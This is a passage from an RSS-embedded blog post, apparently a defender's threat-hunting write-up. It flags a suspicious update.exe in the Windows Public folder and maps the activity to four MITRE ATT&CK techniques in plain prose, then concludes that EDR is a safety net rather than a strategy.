&lt;ul&gt;
&lt;li&gt;&lt;p&gt;What is an update.exe file doing within the Public folder? &lt;br&gt;
Normally, legitimate Windows system updates generally reside in secured system folders, such as &lt;code&gt;C:\Windows\System32&lt;/code&gt; or &lt;code&gt;C:\Windows\SoftwareDistribution&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The file was named WindowsUpdateCheck. Such liars! They think we would overlook that. Not today buddy.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Attack Mapping&lt;/strong&gt; &lt;/p&gt;

&lt;p&gt;&lt;a href="https://attack.mitre.org/" rel="noopener noreferrer"&gt;MITRE ATT&amp;amp;CK&lt;/a&gt; is one amazing resource, that informs on various techniques used by known threat actors to attack organizations. &lt;/p&gt;

&lt;p&gt;Here's the MITRE ATT&amp;amp;CK mapping:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Command and Scripting Interpreter (T1059)&lt;/strong&gt; — Attackers abuse scripting tools like PowerShell that are already trusted and native to the OS. Because these tools are used legitimately every day, security solutions often can't tell the difference between normal and malicious use — making it a go-to for staying under the radar.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Scheduled Task/Job (T1053)&lt;/strong&gt; — Built-in task scheduling features can be weaponized to automatically re-run malicious code at set intervals, even after a reboot. It's a persistence trick that blends in because scheduled tasks are completely normal system behavior.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Data Encoding (T1132)&lt;/strong&gt; — Encoding is used to obscure the true intent of a command, making it harder for security tools to recognise a known-bad string or pattern. It's essentially a way to wrap something malicious in something that looks like gibberish.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Ingress Tool Transfer (T1105)&lt;/strong&gt; — Rather than dropping files on disk where they can be scanned and flagged, attackers can pull remote payloads directly into memory at runtime. No file, no footprint, nothing for an antivirus to sink its teeth into.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;br&gt;
Threat hunting isn't about waiting for an alarm to go off — it's about assuming something is already wrong and searching for the problem. This exercise showed how an attacker can move through a system, leaving almost no trace for automated solutions to catch.&lt;/p&gt;

&lt;p&gt;The key takeaway? Your EDR is a safety net, not a security strategy.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>monitoring</category>
      <category>blueteam</category>
      <category>blog</category>
    </item>
  </channel>
</rss>
